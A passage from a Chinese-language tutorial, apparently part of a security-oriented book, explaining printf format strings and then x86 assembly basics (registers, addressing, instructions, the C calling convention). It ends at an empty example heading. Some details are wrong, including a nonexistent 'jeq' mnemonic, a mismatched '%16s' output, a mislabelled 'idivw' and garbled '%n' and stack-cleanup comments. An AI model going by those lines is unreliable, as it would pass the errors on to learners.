dprintf() 等同于 fprintf()，但是它输出不是流而是一个文件描述符 fd。
vfprintf()、vprintf()、vsprintf()、vsnprintf()、vdprintf() 分别与上面的函数对应，只是它们将变参列表换成了 va_list 类型的参数。

格式字符串

格式字符串是由普通字符（ordinary character）（包括 %）和转换规则（conversion specification）构成的字符序列。普通字符被原封不动地复制到输出流中。转换规则根据与实参对应的转换指示符对其进行转换，然后将结果写入输出流中。

一个转换规则有可选部分和必需部分组成：

%[ 参数 ][ 标志 ][ 宽度 ][ .精度 ][ 长度 ] 转换指示符

（必需）转换指示符

字符	描述
`d`, `i`	有符号十进制数值 `int`。'`%d`' 与 '`%i`' 对于输出是同义；但对于 `scanf()` 输入二者不同，其中 `%i` 在输入值有前缀 `0x` 或 `0` 时，分别表示 16 进制或 8 进制的值。如果指定了精度，则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0，则输出为空
`u`	十进制 `unsigned int`。如果指定了精度，则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0，则输出为空
`f`, `F`	`double` 型输出 10 进制定点表示。'`f`' 与 '`F`' 差异是表示无穷与 NaN 时，'`f`' 输出 '`inf`', '`infinity`' 与 '`nan`'；'`F`' 输出 '`INF`', '`INFINITY`' 与 '`NAN`'。小数点后的数字位数等于精度，最后一位数字四舍五入。精度默认为 6。如果精度为 0 且没有 # 标记，则不出现小数点。小数点左侧至少一位数字
`e`, `E`	`double` 值，输出形式为 10 进制的([`-`]d.ddd `e`[`+`/`-`]ddd). `E` 版本使用的指数符号为 `E`（而不是`e`）。指数部分至少包含 2 位数字，如果值为 0，则指数部分为 00。Windows 系统，指数部分至少为 3 位数字，例如 1.5e002，也可用 Microsoft 版的运行时函数 `_set_output_format` 修改。小数点前存在 1 位数字。小数点后的数字位数等于精度。精度默认为 6。如果精度为 0 且没有 # 标记，则不出现小数点
`g`, `G`	`double` 型数值，精度定义为全部有效数字位数。当指数部分在闭区间 [-4,精度] 内，输出为定点形式；否则输出为指数浮点形式。'`g`' 使用小写字母，'`G`' 使用大写字母。小数点右侧的尾数 0 不被显示；显示小数点仅当输出的小数部分不为 0
`x`, `X`	16 进制 `unsigned int`。'`x`' 使用小写字母；'`X`' 使用大写字母。如果指定了精度，则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0，则输出为空
`o`	8 进制 `unsigned int`。如果指定了精度，则输出的数字不足时在左侧补 0。默认精度为 1。精度为 0 且值为 0，则输出为空
`s`	如果没有用 `l` 标志，输出 `null` 结尾字符串直到精度规定的上限；如果没有指定精度，则输出所有字节。如果用了 `l` 标志，则对应函数参数指向 `wchar_t` 型的数组，输出时把每个宽字符转化为多字节字符，相当于调用 `wcrtomb` 函数
`c`	如果没有用 `l` 标志，把 `int` 参数转为 `unsigned char` 型输出；如果用了 `l` 标志，把 `wint_t` 参数转为包含两个元素的 `wchart_t` 数组，其中第一个元素包含要输出的字符，第二个元素为 `null` 宽字符
`p`	`void *` 型，输出对应变量的值。`printf("%p", a)` 用地址的格式打印变量 `a` 的值，`printf("%p", &a)` 打印变量 `a` 所在的地址
`a`, `A`	`double` 型的 16 进制表示，"[−]0xh.hhhh p±d"。其中指数部分为 10 进制表示的形式。例如：1025.010 输出为 0x1.004000p+10。'`a`' 使用小写字母，'`A`' 使用大写字母
`n`	不输出字符，但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量
`%`	'`%`' 字面值，不接受任何除了 `参数` 以外的部分

（可选）参数

字符	描述
`n$`	`n` 是用这个格式说明符显示第几个参数；这使得参数可以输出多次，使用多个格式说明符，以不同的顺序输出。如果任意一个占位符使用了 `参数`，则其他所有占位符必须也使用 `参数`。例：`printf("%2$d %2$#x; %1$d %1$#x",16,17)` 产生 "`17 0x11; 16 0x10`"

（可选）标志

字符	描述
`+`	总是表示有符号数值的 '`+`' 或 '`-`' 号，缺省情况是忽略正数的符号。仅适用于数值类型
空格	使得有符号数的输出如果没有正负号或者输出 0 个字符，则前缀 1 个空格。如果空格与 '`+`' 同时出现，则空格说明符被忽略
`-`	左对齐。缺省情况是右对齐
`#`	对于 '`g`' 与 '`G`'，不删除尾部 0 以表示精度。对于 '`f`', '`F`', '`e`', '`E`', '`g`', '`G`', 总是输出小数点。对于 '`o`', '`x`', '`X`', 在非 0 数值前分别输出前缀 `0`, `0x` 和 `0X`表示数制
`0`	如果 `宽度` 选项前缀为 `0`，则在左侧用 `0` 填充直至达到宽度要求。例如 `printf("%2d", 3)` 输出 "`3`"，而 `printf("%02d", 3)` 输出 "`03`"。如果 `0` 与 `-` 均出现，则 `0` 被忽略，即左对齐依然用空格填充

（可选）宽度

是一个用来指定输出字符的最小个数的十进制非负整数。如果实际位数多于定义的宽度,则按实际位数输出；如果实际位数少于定义的宽度则补以空格或 0。

（可选）精度

精度是用来指示打印字符个数、小数位数或者有效数字个数的非负十进制整数。对于 d、i、u、x、o 的整型数值，是指最小数字位数，不足的位要在左侧补 0，如果超过也不截断，缺省值为 1。对于 a, A, e, E, f, F 的浮点数值，是指小数点右边显示的数字位数，必要时四舍五入；缺省值为 6。对于 g, G 的浮点数值，是指有效数字的最大位数。对于 s 的字符串类型，是指输出的字节的上限，超出限制的其它字符将被截断。如果域宽为 *，则由对应的函数参数的值为当前域宽。如果仅给出了小数点，则域宽为 0。

（可选）长度

字符	描述
`hh`	对于整数类型，`printf` 期待一个从 `char` 提升的 `int` 整型参数
`h`	对于整数类型，`printf` 期待一个从 `short` 提升的 `int` 整型参数
`l`	对于整数类型，`printf` 期待一个 `long` 整型参数。对于浮点类型，`printf` 期待一个 `double` 整型参数。对于字符串 `s` 类型，`printf` 期待一个 `wchar_t` 指针参数。对于字符 `c` 类型，`printf` 期待一个 `wint_t` 型的参数
`ll`	对于整数类型，`printf` 期待一个 `long long` 整型参数。Microsoft 也可以使用 `I64`
`L`	对于浮点类型，`printf` 期待一个 `long double` 整型参数
`z`	对于整数类型，`printf` 期待一个 `size_t` 整型参数
`j`	对于整数类型，`printf` 期待一个 `intmax_t` 整型参数
`t`	对于整数类型，`printf` 期待一个 `ptrdiff_t` 整型参数

例子

printf("Hello %%");           // "Hello %"
printf("Hello World!");       // "Hello World!"
printf("Number: %d", 123);    // "Number: 123"
printf("%s %s", "Format", "Strings");   // "Format Strings"

printf("%12c", 'A');          // "           A"
printf("%16s", "Hello");      // "          Hello!"

int n;
printf("%12c%n", 'A', &n);    // n = 12
printf("%16s%n", "Hello!", &n); // n = 16

printf("%2$s %1$s", "Format", "Strings"); // "Strings Format"
printf("%42c%1$n", &n);       // 首先输出41个空格，然后输出 n 的低八位地址作为一个字符

这里我们对格式化输出函数和格式字符串有了一个详细的认识，后面的章节中我们会介绍格式化字符串漏洞的内容。

汇编语言

汇编语言
- 3.3 X86 汇编基础
  - 3.3.2 寄存器 Registers
  - 3.3.3 内存和寻址模式 Memory and Addressing Modes
  - 3.3.4 指令 Instructions
  - 3.3.5 调用约定 Calling Convention
    - 3.3.5.1 调用者约定 Caller Rules
    - 3.3.5.2 被调用者约定 Callee Rules
- 3.4 x64 汇编基础
  - 3.4.1 导语
  - 3.4.2 寄存器 Registers
  - 3.4.3 寻址模式 Addressing modes
  - 3.4.4 通用指令 Common instructions
- 3.5 ARM汇编基础
- 3.6 MIPS汇编基础

3.3 X86 汇编基础

3.3.2 寄存器 Registers

现代 ( 386及以上的机器 )x86 处理器有 8 个 32 位通用寄存器, 如图 1 所示.

这些寄存器的名字都是有点历史的, 例如 EAX 过去被称为 累加器, 因为它被用来作很多算术运算, 还有 ECX 被称为 计数器 , 因为它被用来保存循环的索引 ( 就是循环次数 ). 尽管大多是寄存器在现代指令集中已经失去了它们的特殊用途, 但是按照惯例, 其中有两个寄存器还是有它们的特殊用途 ---ESP 和 EBP.

对于 EAS, EBX, ECX 还有 EDX 寄存器, 它们可以被分段开来使用. 例如, 可以将 EAX 的最低的 2 位字节视为 16 位寄存器 ( AX ). 还可以将 AX 的最低位的 1 个字节看成 8 位寄存器来用 ( AL ), 当然 AX 的高位的 1 个字节也可以看成是一个 8 位寄存器 ( AH ). 这些名称有它们相对应的物理寄存器. 当两个字节大小的数据被放到 DX 的时候, 原本 DH, DL 和 EDX 的数据会受到影响 ( 被覆盖之类的 ). 这些 " 子寄存器 " 主要来自于比较久远的 16 位版本指令集. 然而, 姜还是老的辣, 在处理小于 32 位的数据的时候, 比如 1 个字节的 ASCII 字符, 它们有时会很方便.

3.3.3 内存和寻址模式 Memory and Addressing Modes

3.3.3.1 声明静态数据区域

你可以用特殊的 x86 汇编指令在内存中声明静态数据区域 ( 类似于全局变量 ). .data指令用来声明数据. 根据这条指令, .byte, .short 和 .long 可以分别用来声明 1 个字节, 2 个字节和 4 个字节的数据. 我们可以给它们打个标签, 用来引用创建的数据的地址. 标签在汇编语言中是非常有用的, 它们给内存地址命名, 然后编译器 和链接器 将其 " 翻译 " 成计算机理解的机器代码. 这个跟用名称来声明变量很类似, 但是它遵守一些较低级别的规则. 例如, 按顺序声明的位置将彼此相邻地存储在内存中. 这话也许有点绕, 就是按照顺序打的标签, 这些标签对应的数据也会按照顺序被放到内存中.

一些例子 :

.data
var :
       .byte 64 ;声明一个字节型变量 var, 其所对应的数据是64
       .byte 10 ;声明一个数据 10, 这个数据没有所谓的 " 标签 ", 它的内存地址就是 var+1.

x :
       .short 42 ;声明一个大小为 2 个字节的数据, 这个数据有个标签 " x "

y :
       .long 30000 ;声明一个大小为 4 个字节的数据, 这个数据标签是 " y ",  y 的值被初始化为 30000

与高级语言不同, 高级语言的数组可以具有多个维度并且可以通过索引来访问, x86 汇编语言的数组只是在内存中连续的" 单元格 ". 你只需要把数值列出来就可以声明一个数组, 比如下面的第一个例子. 对于一些字节型数组的特殊情况, 我们可以使用字符串. 如果要在大多数的内存填充 0, 你可以使用.zero指令.

例子 :

s :
       .long 1, 2, 3 ;声明 3 个大小为 4 字节的数据 1, 2, 3. 内存中 s+8 这个标签所对应的数据就是 3.

barr:
       .zero 10 ;从 barr 这个标签的位置开始, 声明 10 个字节的数据, 这些数据被初始化为 0.

str :
       .string "hello" ;从 str 这个标签的位置开始, 声明 6 个字节的数据, 即 hello 对应的 ASCII 值, 这最后还跟有一个 nul(0) 字节.

label_s

label_barr

label_str

3.3.3.2 内存寻址

现代x86兼容处理器能够寻址高达 2^32 字节的内存 : 内存地址为 32 位宽. 在上面的示例中，我们使用标签来引用内存区域，这些标签实际上被 32 位数据的汇编程序替换，这些数据指定了内存中的地址. 除了支持通过标签（即常数值）引用存储区域之外，x86提供了一种灵活的计算和引用内存地址的方案：最多可将两个32位寄存器和一个32位有符号常量相加，以计算存储器地址. 其中一个寄存器可以选择预先乘以 2, 4 或 8.

寻址模式可以和许多 x86 指令一起使用 ( 我们将在下一节对它们进行讲解 ). 这里我们用mov指令在寄存器和内存中移动数据当作例子. 这个指令有两个参数, 第一个是数据的来源, 第二个是数据的去向.

一些mov的例子 :

mov (%ebx), %eax ;从 EBX 中的内存地址加载 4 个字节的数据到 EAX, 就是把 EBX 中的内容当作标签, 这个标签在内存中对应的数据放到 EAX 中
;后面如果没有说明的话, (%ebx)就表示寄存器ebx中存储的内容

mov %ebx, var(,1) ; 将 EBX 中的 4 个字节大小的数据移动的内存中标签为 var 的地方去.( var 是一个 32 位常数).

mov (%esi, %ebx, 4), %edx ;将内存中标签为 ESI+4*EBX 所对应的 4 个字节大小的数据移动到 EDX中.

一些错误的例子:

mov (%ebx, %ecx, -1), %eax ;这个只能把寄存器中的值加上一遍.
mov %ebx,(%eax, %esi, %edi, 1) ;在地址计算中, 最多只能出现 2 个寄存器, 这里却有 3 个寄存器.

3.3.3.3 操作后缀

通常, 给定内存地址的数据类型可以从引用它的汇编指令推断出来. 例如, 在上面的指令中, 你可以从寄存器操作数的大小来推出其所占的内存大小. 当我们加载一个 32 位的寄存器的时候, 编译器就可以推断出我们用到的内存大小是 4 个字节宽. 当我们将 1 个字节宽的寄存器的值保存到内存中时, 编译器可以推断出我们想要在内存中弄个 1 字节大小的 " 坑 " 来保存我们的数据.

然而在某些情况下, 我们用到的内存中 " 坑 " 的大小是不明确的. 比如说这条指令 mov $2,(%ebx). 这条指令是否应该将 " 2 " 这个值移动到 EBX 中的值所代表的地址 " 坑 " 的单个字节中 ? 也许它表示的是将 32 位整数表示的 2 移动到从地址 EBX 开始的 4 字节. 既然这两个解释都有道理, 但计算机汇编程序必须明确哪个解释才是正确的, 计算机很单纯的, 要么是错的要么是对的. 前缀 b, w, 和 l 就是来解决这个问题的, 它们分别表示 1, 2 和 4 个字节的大小.

举几个例子 :

movb $2, (%ebx) ;将 2 移入到 ebx 中的值所表示的地址单元中.
movw $2, (%ebx) ;将 16 位整数 2 移动到 从 ebx 中的值所表示的地址单元 开始的 2 个字节中;这话有点绕, 所以我故意在里面加了点空格, 方便大家理解.
movl $2,(%ebx) ;将 32 位整数 2 移动到 从 ebx中的值表示的地址单元 开始的 4 个字节中.

3.3.4 指令 Instructions

机器指令通常分为 3 类 : 数据移动指令, 逻辑运算指令和流程控制指令. 在本节中, 我们将讲解每一种类型的 x86 指令以及它们的重要示例. 当然, 我们不可能把 x86 所有指令讲得特别详细, 毕竟篇幅和水平有限. 完整的指令列表, 请参阅 intel 的指令集参考手册.

我们将使用以下符号 :

<reg32 任意的 32 位寄存器 (%eax, %ebx, %ecx, %edx, %esi, %edi, %esp 或者 %eb)
<reg16 任意的 16 位寄存器 (%ax, %bx, %cx 或者 %dx)
<reg8 任意的 8 位寄存器 (%ah, %al, %bh, %bl, %ch, %cl, %dh, %dl)
<reg 任意的寄存器
<mem 一个内存地址, 例如 (%eax), 4+var, (%eax, %ebx, 1)
<con32 32 位常数
<con16 16 位常数
<con8 8 位常数
<con 任意 32位, 16 位或者 8 位常数

在汇编语言中, 用作立即操作数 的所有标签和数字常量 ( 即不在诸如3 (%eax, %ebx, 8)这样的地址计算中 ) 总是以美元符号 $ 为前缀. 需要的时候, 前缀 0x 表示十六进制数, 例如$ 0xABC. 如果没有前缀, 则默认该数字为十进制数.

3.3.4.1 数据移动指令

mov 移动

mov 指令将数据从它的第一个参数 ( 即寄存器中的内容, 内存单元中的内容, 或者一个常数值 ) 复制到它的第二个参数 ( 即寄存器或者内存单元 ). 当寄存器到寄存器之间的数据移动是可行的时候, 直接地从内存单元中将数据移动到另一内存单元中是不行的. 在这种需要在内存单元中传递数据的情况下, 它数据来源的那个内存单元必须首先把那个内存单元中的数据加载到一个寄存器中, 然后才可以通过这个寄存器来把数据移动到目标内存单元中.

语法

mov <reg, <reg
mov <reg, <mem
mov <mem, <reg
mov <con, <reg
mov <con, <mem

例子

mov %ebx, %eax ;将 EBX 中的值复制到 EAX 中
mov $5, var(,1) ;将数字 5 存到字节型内存单元 " var "

mov_1

push 入栈

push指令将它的参数移动到硬件支持的栈内存顶端. 特别地, push 首先将 ESP 中的值减少 4, 然后将它的参数移动到一个 32 位的地址单元 ( %esp ). ESP ( 栈指针 ) 会随着不断入栈从而持续递减, 即栈内存是从高地址单元到低地址单元增长.

语法

push <reg32
push <mem
push <con32

例子

push %eax ;将 EAX 送入栈
push var(,1) ;将 var 对应的 4 字节大小的数据送入栈中

pop 出栈

pop指令从硬件支持的栈内存顶端移除 4 字节的数据, 并把这个数据放到该指令指定的参数中 ( 即寄存器或者内存单元 ). 其首先将内存中 ( %esp ) 的 4 字节数据放到指定的寄存器或者内存单元中, 然后让 ESP + 4.

语法

pop <reg32
pop <mem

例子

pop %edi ;将栈顶的元素移除, 并放入到寄存器 EDI 中.
pop (%ebx) ;将栈顶的元素移除, 并放入从 EBX 开始的 4 个字节大小的内存单元中.

重点内容 : 栈栈是一种特殊的存储空间, 特殊在它的访问形式上, 它的访问形式就是最后进入这个空间的数据, 最先出去, 也就是 "先进后出, 后进先出".

lea加载有效地址

lea指令将其第一个参数指定的内存单元放入到第二个参数指定的寄存器中. 注意, 该指令不加载内存单元中的内容, 只是计算有效地址并将其放入寄存器. 这对于获得指向存储器区域的指针或者执行简单的算术运算非常有用.

也许这里你会看得一头雾水, 不过你不必担心, 这里有更为通俗易懂的解释. 汇编语言中 lea 指令和 mov 指令的区别 ? MOV 指令的功能是传送数据，例如 MOV AX,[1000H]，作用是将 1000H 作为偏移地址，寻址找到内存单元，将该内存单元中的数据送至 AX； LEA 指令的功能是取偏移地址，例如 LEA AX,[1000H]，作用是将源操作数 [1000H] 的偏移地址 1000H 送至 AX。理解时，可直接将[ ]去掉，等同于 MOV AX,1000H。再如：LEA BX,[AX]，等同于 MOV BX,AX；LEA BX,TABLE 等同于 MOV BX,OFFSET TABLE。但有时不能直接使用 MOV 代替：比如：LEA AX,[SI+6] 不能直接替换成：MOV AX,SI+6；但可替换为： MOV AX,SI ADD AX,6 两步完成。

参考链接

语法

lea <mem, <reg32

例子

lea (%ebx,%esi,8), %edi ;EBX+8*ESI 的值被移入到了 EDI
lea val(,1), %eax ;val 的值被移入到了 EAX

3.3.4.2 逻辑运算指令

add 整数相加

add 指令将两个参数相加, 然后将结果存放到第二个参数中. 注意, 参数可以是寄存器,但参数中最多只有一个内存单元. 这话有点绕, 我们直接看语法 :

语法

add <reg, <reg
add <mem, <reg
add <reg, <mem
add <con, <reg
add <con, <mem

例子

add $10, %eax ;EAX 中的值被设置为了 EAX+10.
addb $10, (%eax) ;往 EAX 中的值 所代表的内存单元地址 加上 1 个字节的数字 10.

sub 整数相减

sub指令将第二个参数的值与第一个相减, 就是后面那个减去前面那个, 然后把结果存储到第二个参数. 和add一样, 两个参数都可以是寄存器, 但两个参数中最多只能有一个是内存单元.

语法

sub <reg, <reg
sub <mem, <reg
sub <con, <reg
sub <con, <mem

例子

sub %ah, %al ;AL 被设置成 AL-AH
sub $216, %eax ;将 EAX 中的值减去 216

inc, dec 自增, 自减

inc 指令让它的参数加 1, dec 指令则是让它的参数减去 1.

语法

inc <reg
inc <mem
dec <reg
dec <mem

例子

dec %eax ;EAX 中的值减去 1
incl var(,1) ;将 var 所代表的 32 位整数加上 1.

imul 整数相乘

imul 指令有两种基本格式 : 第一种是 2 个参数的 ( 看下面语法开始两条 ); 第二种格式是 3 个参数的 ( 看下面语法最后两条 ).

2 个参数的这种格式, 先是将两个参数相乘, 然后把结果存到第二个参数中. 运算结果 ( 即第二个参数 ) 必须是一个寄存器.

3 个参数的这种格式, 先是将它的第 1 个参数和第 2 个参数相乘, 然后把结果存到第 3 个参数中, 当然, 第 3 个参数必须是一个寄存器. 此外, 第 1 个参数必须是一个常数.

语法

imul <reg32, <reg32
imul <mem, <reg32
imul <con, <reg32, <reg32
imul <con, <mem, <reg32

例子

imul (%ebx), %eax ;将 EAX 中的 32 位整数, 与 EBX 中的内容所指的内存单元, 相乘, 然后把结果存到 EAX 中.
imul $25, %edi, %esi ;ESI 被设置为 EDI * 25.

idiv 整数相除

idiv只有一个操作数，此操作数为除数，而被除数则为 EDX : EAX 中的内容（一个64位的整数），除法结果 ( 商 ) 存在 EAX 中, 而所得的余数存在 EDX 中.

语法

idiv <reg32
idiv <mem

例子

idiv %ebx ;用 EDX : EAX 的值除以 EBX 的值. 商存放在 EAX 中, 余数存放在 EDX 中.
idivw (%ebx) ;将 EDX : EAX 的值除以存储在 EBX 所对应内存单元的 32 位值. 商存放在 EAX 中, 余数存放在 EDX 中.

and, or, xor 按位逻辑与, 或, 异或运算

这些指令分别对它们的参数进行相应的逻辑运算, 运算结果存到第一个参数中.

语法

and <reg, <reg
and <mem, <reg
and <reg, <mem
and <con, <reg
and <con, <mem

or <reg, <reg
or <mem, <reg
or <reg, <mem
or <con, <reg
or <con, <mem

xor <reg, <reg
xor <mem, <reg
xor <reg, <mem
xor <con, <reg
xor <con, <mem

例子

and $0x0F, %eax ;只留下 EAX 中最后 4 位数字 (二进制位)
xor %edx, %edx ;将 EDX 的值全部设置成 0

not 逻辑位运算非

对参数进行逻辑非运算, 即翻转参数中所有位的值.

语法

not <reg
not <mem

例子

not %eax ;将 EAX 的所有值翻转.

neg 取负指令

取参数的二进制补码负数. 直接看例子也许会更好懂.

语法

neg <reg
neg <mem

例子

neg %eax ;EAX → -EAX

shl, shr 按位左移或者右移

这两个指令对第一个参数进行位运算, 移动的位数由第二个参数决定, 移动过后的空位拿 0 补上.被移的参数最多可以被移 31 位. 第二个参数可以是 8 位常数或者寄存器 CL. 在任意情况下, 大于 31 的移位都默认是与 32 取模.

语法

shl <con8, <reg
shl <con8, <mem
shl %cl, <reg
shl %cl, <mem

shr <con8, <reg
shr <con8, <mem
shr %cl, <reg
shr %cl, <mem

例子

shl $1, %eax ;将 EAX 的值乘以 2 (如果最高有效位是 0 的话)
shr %cl, %ebx ;将 EBX 的值除以 2n, 其中 n 为 CL 中的值, 运算最终结果存到 EBX 中.
你也许会想, 明明只是把数字二进制移了 1 位, 结果却是等于这个数字乘以 2.什么情况 ? 这几个位运算的结果和计算机表示数字的原理有关,请看本章附录的计算机数字表示.

3.3.4.3 流程控制指令

x86 处理器有一个指令指针寄存器 ( EIP ), 该寄存器为 32 位寄存器, 它用来在内存中指示我们输入汇编指令的位置. 就是说这个寄存器指向哪个内存单元, 那个单元存储的机器码就是程序执行的指令. 通常它是指向我们程序要执行的下一条指令. 但是你不能直接操作 EIP 寄存器, 你需要流程控制指令来隐式地给它赋值.

我们使用符号 <label 来当作程序中的标签. 通过输入标签名称后跟冒号, 可以将标签插入 x86 汇编代码文本中的任何位置. 例如 :

       mov 8(%ebp), %esi
begin:
       xor %ecx, %ecx
       mov (%esi), %eax

该代码片段中的第二段被套上了 " begin " 这个标签. 在代码的其它地方, 我们可以用 " begin " 这个标签从而更方便地来引用这段指令在内存中的位置. 这个标签只是用来更方便地表示位置的, 它并不是用来代表某个 32 位值.

jmp 跳转指令

将程序跳转到参数指定的内存地址, 然后执行该内存地址的指令.
语法

jmp <label

例子

jmp begin ;跳转到打了 " begin " 这个标签的地方

jmp

jcondition 有条件的跳转

这些指令是条件跳转指令, 它们基于一组条件代码的状态, 这些条件代码的状态存放在称为机器状态字 ( machine status word ) 的特殊寄存器中. 机器状态字的内容包括关于最后执行的算术运算的信息. 例如, 这个字的一个位表示最后的结果是否为 0. 另一个位表示最后结果是否为负数. 基于这些条件代码, 可以执行许多条件跳转. 例如, 如果最后一次算术运算结果为 0, 则 jz 指令就是跳转到指定参数标签. 否则, 程序就按照流程进入下一条指令.

许多条件分支的名称都是很直观的, 这些指令的运行, 都和一个特殊的比较指令有关, cmp( 见下文 ). 例如, 像 jle 和 jne 这种指令, 它们首先对参数进行 cmp 操作.

语法

je <label ;当相等的时候跳转
jne <label ;当不相等的时候跳转
jz <label ;当最后结果为 0 的时候跳转
jg <label ;当大于的时候跳转
jge <label ;当大于等于的时候跳转
jl <label ;当小于的时候跳转
jle <label ;当小于等于的时候跳转

例子

cmp %ebx, %eax
jle done
;如果 EAX 的值小于等于 EBX 的值, 就跳转到 " done " 标签, 否则就继续执行下一条指令.

jcondition

cmp 比较指令

比较两个参数的值, 适当地设置机器状态字中的条件代码. 此指令与sub指令类似，但是cmp不用将计算结果保存在操作数中.

语法

cmp <reg, <reg
cmp <mem, <reg
cmp <reg, <mem
cmp <con, <reg

例子

cmpb $10, (%ebx)
jeq loop
;如果 EBX 的值等于整数常量 10, 则跳转到标签 " loop " 的位置.

cmp

call, ret 子程序调用与返回

这两个指令实现子程序的调用和返回. call 指令首先将当前代码位置推到内存中硬件支持的栈内存上 ( 请看 push 指令 ), 然后无条件跳转到标签参数指定的代码位置. 与简单的 jmp 指令不同, call 指令保存了子程序完成时返回的位置. 就是 call 指令结束后, 返回到调用之前的地址.

ret 指令实现子程序的返回. 该指令首先从栈中取出代码 ( 类似于 pop 指令 ). 然后它无条件跳转到检索到的代码位置.

语法

call <label
ret

3.3.5 调用约定 Calling Convention

为了方便不同的程序员去分享代码和运行库, 并简化一般子程序的使用, 程序员们通常会遵守一定的约定 ( Calling Convention ). 调用约定是关于如何从例程调用和返回的协议. 例如，给定一组调用约定规则，程序员不需要检查子例程的定义来确定如何将参数传递给该子例程. 此外，给定一组调用约定规则，可以使高级语言编译器遵循规则，从而允许手动编码的汇编语言例程和高级语言例程相互调用.

我们将讲解被广泛使用的 C 语言调用约定. 遵循此约定将允许您编写可从 C ( 和C ++ ) 代码安全地调用的汇编语言子例程, 并且还允许您从汇编语言代码调用 C 函数库.

C 调用约定很大程度上取决于使用硬件支持的栈内存. 它基于 push, pop, call 和 ret 指令. 子程序的参数在栈上传递. 寄存器保存在栈中, 子程序使用的局部变量放在栈中. 在大多数处理器上实现的高级过程语言都使用了类似的调用约定.

调用约定分为两组. 第一组规则是面向子例程的调用者 ( Caller ) 的, 第二组规则面向子例程的编写者, 即被调用者 ( Callee ). 应该强调的是, 错误地遵守这些规则会导致程序的致命错误, 因为栈将处于不一致的状态; 因此, 在你自己的子例程中实现调用约定的时候, 务必当心.

stack-convention

将调用约定可视化的一种好方法是, 在子例程执行期间画一个栈内存附近的图. 图 2 描绘了在执行具有三个参数和三个局部变量的子程序期间栈的内容. 栈中描绘的单元都是 32 位内存单元, 因此这些单元的内存地址相隔 4 个字节. 第一个参数位于距基指针 8 个字节的偏移处. 在栈参数的上方 ( 和基指针下方 ), call 指令在这放了返回地址, 从而导致从基指针到第一个参数有额外 4 个字节的偏移量. 当 ret 指令用于从子程序返回时, 它将跳转到栈中的返回地址.

3.3.5.1 调用者约定 Caller Rules

要进行子程序调用, 调用者应该 :

在调用子例程之前, 调用者应该保存指定调用者保存 ( Caller-saved )的某些寄存器的内容. 调用者保存的寄存器是 EAX, ECX, EDX. 由于被调用的子程序可以修改这些寄存器, 所以如果调用者在子例程返回后依赖这些寄存器的值, 调用者必须将这些寄存器的值入栈, 然后就可以在子例程返回后恢复它们.
要把参数传递给子例程, 你可以在调用之前把参数入栈. 参数的入栈顺序应该是反着的, 就是最后一个参数应该最先入栈. 随着栈内存地址增大, 第一个参数将存储在最低的地址, 在历史上, 这种参数的反转用于允许函数传递可变数量的参数.
要调用子例程, 请使用call指令. 该指令将返回地址存到栈上, 并跳转到子程序的代码. 这个会调用子程序, 这个子程序应该遵循下面的被调用者约定.

子程序返回后 ( 紧跟调用指令后 ), 调用者可以期望在寄存器 EAX 中找到子例程的返回值. 要恢复机器状态 ( machine state ), 调用者应该 :

从栈中删除参数, 这会把栈恢复到调用之前的状态.
把 EAX, ECX, EDX 之前入栈的内容给出栈, 调用者可以假设子例程没有修改其它寄存器.
例子

下面的代码就是个活生生的例子, 它展示了遵循约定的函数调用. 调用者正在调用一个带有 3 个整数参数的函数 myFunc. 第一个参数是 EAX, 第二个参数是常数 216; 第三个参数位于 EBX 的值所代表的内存地址.

push (%ebx) ;最后一个参数最先入栈
push $216 ;把第二个参数入栈
push %eax ;第一个参数最后入栈

call myFunc ;调用这个函数 ( 假设以 C 语言的模式命名 )

add $12, %esp

注意, 在调用返回后, 调用者使用 add 指令来清理栈内存. 我们栈内存中有 12 个字节 ( 3 个参数, 每个参数 4 个字节 ), 然后栈内存地址增大. 因此, 为了摆脱掉这些参数, 我们可以直接往栈里面加个 12.

myFunc 生成的结果现在可以有用于寄存器 EAX. 调用者保存 ( Caller-saved ) 的寄存器 ( ECX, EDX ) 的值可能已经被修改. 如果调用者在调用之后使用它们，则需要在调用之前将它们保存在堆栈中并在调用之后恢复它们. 说白了就是把栈这个玩意当作临时存放点.

3.3.5.2 被调用者约定 Callee Rules

子例程的定义应该遵循子例程开头的以下规则 :

1.将 EBP 的值入栈, 然后用下面的指示信息把 ESP 的值复制到 EBP 中 :

 push %ebp
 mov  %esp, %ebp

这个初始操作保留了基指针 EBP. 按照约定, 基指针作为栈上找到参数和变量的参考点. 当子程序正在执行的时候, 基指针保存了从子程序开始执行是的栈指针值的副本. 参数和局部变量将始终位于远离基指针值的已知常量偏移处. 我们在子例程的开头推送旧的基指针值，以便稍后在子例程返回时为调用者恢复适当的基指针值. 记住, 调用者不希望子例程修改基指针的值. 然后我们把栈指针移动到 EBP 中, 以获取访问参数和局部变量的参考点.

2.接下来, 通过在栈中创建空间来分配局部变量. 回想一下, 栈会向下增长, 因此要在栈顶部创建空间, 栈指针应该递减. 栈指针递减的数量取决于所需局部变量的数量和大小. 例如, 如果需要 3 个局部整数 ( 每个 4 字节 ), 则需要将堆栈指针递减 12, 从而为这些局部变量腾出空间 ( 即sub $12, %esp ). 和参数一样, 局部变量将位于基指针的已知偏移处.
3.接下来, 保存将由函数使用的被调用者保存的 ( Callee-saved ) 寄存器的值. 要存储寄存器, 请把它们入栈. 被调用者保存 ( Callee-saved ) 的寄存器是 EBX, EDI 和 ESI ( ESP 和 EBP 也将由调用约定保留, 但在这个步骤中不需要入栈 ).

在完成这 3 步之后, 子例程的主体可以继续. 返回子例程的时候, 必须遵循以下步骤 :

将返回值保存在 EAX 中.
恢复已经被修改的任何被调用者保存 ( Callee-saved ) 的寄存器 ( EDI 和 ESI ) 的旧值. 通过出栈来恢复它们. 当然应该按照相反的顺序把它们出栈.
释放局部变量. 显而易见的法子是把相应的值添加到栈指针 ( 因为空间是通过栈指针减去所需的数量来分配的 ). 事实上呢, 解除变量释放的错误的方法是将基指针中的值移动到栈指针 : mov %ebp, %esp. 这个法子有效, 是因为基指针始终包含栈指针在分配局部变量之前包含的值.
在返回之前, 立即通过把 EBP 出栈来恢复调用者的基指针值. 回想一下, 我们在进入子程序的时候做的第一件事是推动基指针保存它的旧值.
最后, 通过执行 ret 指令返回. 这个指令将从栈中找到并删除相应的返回地址 ( call 指令保存的那个 ).

请注意, 被调用者的约定完全被分成了两半, 简直是彼此的镜像. 约定的前半部分适用于函数开头, 并且通常被称为定义函数的序言 ( prologue ) .这个约定的后半部分适用于函数结尾, 因此通常被称为定义函数的结尾 ( epilogue ).

例子
